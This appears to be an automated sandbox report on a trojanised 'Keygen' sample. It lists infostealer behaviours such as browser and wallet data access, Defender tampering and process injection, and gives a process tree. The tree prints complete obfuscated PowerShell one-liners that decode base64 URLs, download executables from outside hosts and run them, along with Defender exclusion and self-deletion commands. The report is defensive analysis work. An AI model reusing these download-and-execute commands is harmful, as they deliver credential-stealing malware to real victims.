-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
1sKivn9gpS.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 1sKivn9gpS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 1sKivn9gpS.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
Processes:
qra.exedescription ioc process File created C:\Users\Admin\AppData\LocalLow\cr6im03b56g32r\desktop.ini qra.exe -
Suspicious use of SetThreadContext 9 IoCs
Processes:
qra.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exetql.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exeuzp.exehgfnmbasdo.exeaxcsdfa.exedescription pid process target process PID 4968 set thread context of 4128 4968 qra.exe qra.exe PID 5064 set thread context of 4172 5064 NHtrdsaghfDF.exe NHtrdsaghfDF.exe PID 5048 set thread context of 4192 5048 FVjhgtresfdbv.exe FVjhgtresfdbv.exe PID 1056 set thread context of 4672 1056 tql.exe tql.exe PID 4700 set thread context of 3912 4700 NHtrdsaghfDF.exe NHtrdsaghfDF.exe PID 4696 set thread context of 4780 4696 FVjhgtresfdbv.exe FVjhgtresfdbv.exe PID 4888 set thread context of 2476 4888 uzp.exe uzp.exe PID 3012 set thread context of 3840 3012 hgfnmbasdo.exe hgfnmbasdo.exe PID 2812 set thread context of 4820 2812 axcsdfa.exe axcsdfa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
hgfnmbasdo.exeFVjhgtresfdbv.exeFVjhgtresfdbv.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString hgfnmbasdo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FVjhgtresfdbv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FVjhgtresfdbv.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 2680 timeout.exe 3316 timeout.exe 4952 timeout.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4552 taskkill.exe 3608 taskkill.exe 4804 taskkill.exe 4176 taskkill.exe -
Modifies registry class 3 IoCs
Processes:
cmd.exeuzp.exehgfnmbasdo.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000_Classes\Local Settings uzp.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000_Classes\Local Settings hgfnmbasdo.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exehgfnmbasdo.exen4Gu4e8lzY.exepid process 2184 powershell.exe 3332 powershell.exe 1116 powershell.exe 2452 powershell.exe 3332 powershell.exe 2184 powershell.exe 1116 powershell.exe 2452 powershell.exe 2184 powershell.exe 3332 powershell.exe 1116 powershell.exe 1116 powershell.exe 2452 powershell.exe 2452 powershell.exe 4332 powershell.exe 4332 powershell.exe 4504 powershell.exe 4504 powershell.exe 4332 powershell.exe 4504 powershell.exe 4332 powershell.exe 4504 powershell.exe 3012 hgfnmbasdo.exe 3012 hgfnmbasdo.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
qra.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exetql.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exepid process 4968 qra.exe 5064 NHtrdsaghfDF.exe 5048 FVjhgtresfdbv.exe 1056 tql.exe 4700 NHtrdsaghfDF.exe 4696 FVjhgtresfdbv.exe -
Suspicious use of AdjustPrivilegeToken 40 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeuzp.exetaskkill.exetaskkill.exehgfnmbasdo.exetaskkill.exeaxcsdfa.exen4Gu4e8lzY.exe1sKivn9gpS.exepowershell.exetaskkill.exepowershell.exeNZV2kyGkCX.exePowershell.exedescription pid process Token: SeDebugPrivilege 3332 powershell.exe Token: SeDebugPrivilege 2184 powershell.exe Token: SeDebugPrivilege 1116 powershell.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeDebugPrivilege 4504 powershell.exe Token: SeDebugPrivilege 4888 uzp.exe Token: SeDebugPrivilege 4804 taskkill.exe Token: SeDebugPrivilege 4176 taskkill.exe Token: SeDebugPrivilege 3012 hgfnmbasdo.exe Token: SeDebugPrivilege 4552 taskkill.exe Token: SeDebugPrivilege 2812 axcsdfa.exe Token: SeDebugPrivilege 3672 n4Gu4e8lzY.exe Token: SeDebugPrivilege 3800 1sKivn9gpS.exe Token: SeDebugPrivilege 2424 powershell.exe Token: SeDebugPrivilege 3608 taskkill.exe Token: SeDebugPrivilege 2600 powershell.exe Token: SeDebugPrivilege 4560 NZV2kyGkCX.exe Token: SeIncreaseQuotaPrivilege 2600 powershell.exe Token: SeSecurityPrivilege 2600 powershell.exe Token: SeTakeOwnershipPrivilege 2600 powershell.exe Token: SeLoadDriverPrivilege 2600 powershell.exe Token: SeSystemProfilePrivilege 2600 powershell.exe Token: SeSystemtimePrivilege 2600 powershell.exe Token: SeProfSingleProcessPrivilege 2600 powershell.exe Token: SeIncBasePriorityPrivilege 2600 powershell.exe Token: SeCreatePagefilePrivilege 2600 powershell.exe Token: SeBackupPrivilege 2600 powershell.exe Token: SeRestorePrivilege 2600 powershell.exe Token: SeShutdownPrivilege 2600 powershell.exe Token: SeDebugPrivilege 2600 powershell.exe Token: SeSystemEnvironmentPrivilege 2600 powershell.exe Token: SeRemoteShutdownPrivilege 2600 powershell.exe Token: SeUndockPrivilege 2600 powershell.exe Token: SeManageVolumePrivilege 2600 powershell.exe Token: 33 2600 powershell.exe Token: 34 2600 powershell.exe Token: 35 2600 powershell.exe Token: 36 2600 powershell.exe Token: SeDebugPrivilege 4108 Powershell.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
Keygen.exeqra.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exetql.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exen4Gu4e8lzY.exepid process 2108 Keygen.exe 4968 qra.exe 5048 FVjhgtresfdbv.exe 5064 NHtrdsaghfDF.exe 1056 tql.exe 4700 NHtrdsaghfDF.exe 4696 FVjhgtresfdbv.exe 3672 n4Gu4e8lzY.exe 3672 n4Gu4e8lzY.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Keygen — копия (9).execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exepowershell.exepowershell.exeqra.exedescription pid process target process PID 3860 wrote to memory of 1432 3860 Keygen — копия (9).exe cmd.exe PID 3860 wrote to memory of 1432 3860 Keygen — копия (9).exe cmd.exe PID 3860 wrote to memory of 1432 3860 Keygen — копия (9).exe cmd.exe PID 1432 wrote to memory of 2108 1432 cmd.exe Keygen.exe PID 1432 wrote to memory of 2108 1432 cmd.exe Keygen.exe PID 1432 wrote to memory of 2108 1432 cmd.exe Keygen.exe PID 1432 wrote to memory of 2140 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 2140 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 2140 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 2484 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 2484 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 2484 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 2680 1432 cmd.exe timeout.exe PID 1432 wrote to memory of 2680 1432 cmd.exe timeout.exe PID 1432 wrote to memory of 2680 1432 cmd.exe timeout.exe PID 2140 wrote to memory of 2184 2140 mshta.exe powershell.exe PID 2140 wrote to memory of 2184 2140 mshta.exe powershell.exe PID 2140 wrote to memory of 2184 2140 mshta.exe powershell.exe PID 2484 wrote to memory of 3332 2484 mshta.exe powershell.exe PID 2484 wrote to memory of 3332 2484 mshta.exe powershell.exe PID 2484 wrote to memory of 3332 2484 mshta.exe powershell.exe PID 1432 wrote to memory of 3352 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 3352 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 3352 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 3296 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 3296 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 3296 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 3316 1432 cmd.exe timeout.exe PID 1432 wrote to memory of 3316 1432 cmd.exe timeout.exe PID 1432 wrote to memory of 3316 1432 cmd.exe timeout.exe PID 3352 wrote to memory of 1116 3352 mshta.exe powershell.exe PID 3352 wrote to memory of 1116 3352 mshta.exe powershell.exe PID 3352 wrote to memory of 1116 3352 mshta.exe powershell.exe PID 3296 wrote to memory of 2452 3296 mshta.exe powershell.exe PID 3296 wrote to memory of 2452 3296 mshta.exe powershell.exe PID 3296 wrote to memory of 2452 3296 mshta.exe powershell.exe PID 1432 wrote to memory of 4256 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 4256 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 4256 1432 cmd.exe mshta.exe PID 4256 wrote to memory of 4332 4256 mshta.exe powershell.exe PID 4256 wrote to memory of 4332 4256 mshta.exe powershell.exe PID 4256 wrote to memory of 4332 4256 mshta.exe powershell.exe PID 1432 wrote to memory of 4400 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 4400 1432 cmd.exe mshta.exe PID 1432 wrote to memory of 4400 1432 cmd.exe mshta.exe PID 4400 wrote to memory of 4504 4400 mshta.exe powershell.exe PID 4400 wrote to memory of 4504 4400 mshta.exe powershell.exe PID 4400 wrote to memory of 4504 4400 mshta.exe powershell.exe PID 1116 wrote to memory of 4888 1116 powershell.exe uzp.exe PID 1116 wrote to memory of 4888 1116 powershell.exe uzp.exe PID 1116 wrote to memory of 4888 1116 powershell.exe uzp.exe PID 2184 wrote to memory of 4968 2184 powershell.exe qra.exe PID 2184 wrote to memory of 4968 2184 powershell.exe qra.exe PID 2184 wrote to memory of 4968 2184 powershell.exe qra.exe PID 4968 wrote to memory of 5048 4968 qra.exe FVjhgtresfdbv.exe PID 4968 wrote to memory of 5048 4968 qra.exe FVjhgtresfdbv.exe PID 4968 wrote to memory of 5048 4968 qra.exe FVjhgtresfdbv.exe PID 4968 wrote to memory of 5064 4968 qra.exe NHtrdsaghfDF.exe PID 4968 wrote to memory of 5064 4968 qra.exe NHtrdsaghfDF.exe PID 4968 wrote to memory of 5064 4968 qra.exe NHtrdsaghfDF.exe PID 4968 wrote to memory of 4128 4968 qra.exe qra.exe PID 4968 wrote to memory of 4128 4968 qra.exe qra.exe PID 4968 wrote to memory of 4128 4968 qra.exe qra.exe PID 4968 wrote to memory of 4128 4968 qra.exe qra.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (9).exe"C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (9).exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3975.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (9).exe""2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Users\Admin\AppData\Local\Temp\3975.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2108 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3975.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Users\Public\qra.exe"C:\Users\Public\qra.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5048 -
C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4192 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4192 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\641659638576037\\* & exit8⤵PID:4720
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 41929⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4176 -
C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5064 -
C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"7⤵
- Executes dropped EXE
PID:4172 -
C:\Users\Public\qra.exe"C:\Users\Public\qra.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
PID:4128 -
C:\Users\Admin\AppData\Local\Temp\NZV2kyGkCX.exe"C:\Users\Admin\AppData\Local\Temp\NZV2kyGkCX.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\NZV2kyGkCX.exe"'8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4108 -
C:\Users\Admin\AppData\Local\Temp\YNZNZpqUlS.exe"C:\Users\Admin\AppData\Local\Temp\YNZNZpqUlS.exe"7⤵
- Executes dropped EXE
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\n4Gu4e8lzY.exe"C:\Users\Admin\AppData\Local\Temp\n4Gu4e8lzY.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3672 -
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\ceb3zecv.inf8⤵PID:3700
-
C:\Users\Admin\AppData\Local\Temp\1sKivn9gpS.exe"C:\Users\Admin\AppData\Local\Temp\1sKivn9gpS.exe"7⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:3800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2424 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\qra.exe"7⤵PID:4932
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:4952 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3975.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3332 -
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:2680 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3975.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Users\Public\uzp.exe"C:\Users\Public\uzp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4888 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"6⤵PID:4776
-
C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"8⤵PID:2104
-
C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2812 -
C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"10⤵
- Executes dropped EXE
PID:4820 -
C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"8⤵
- Executes dropped EXE
PID:4768 -
C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3840 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 3840 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\182504754333464\\* & exit9⤵PID:2364
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 384010⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4552 -
C:\Users\Public\uzp.exe"C:\Users\Public\uzp.exe"6⤵
- Executes dropped EXE
PID:2476 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3975.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452 -
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
PID:3316 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3975.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:4256 -
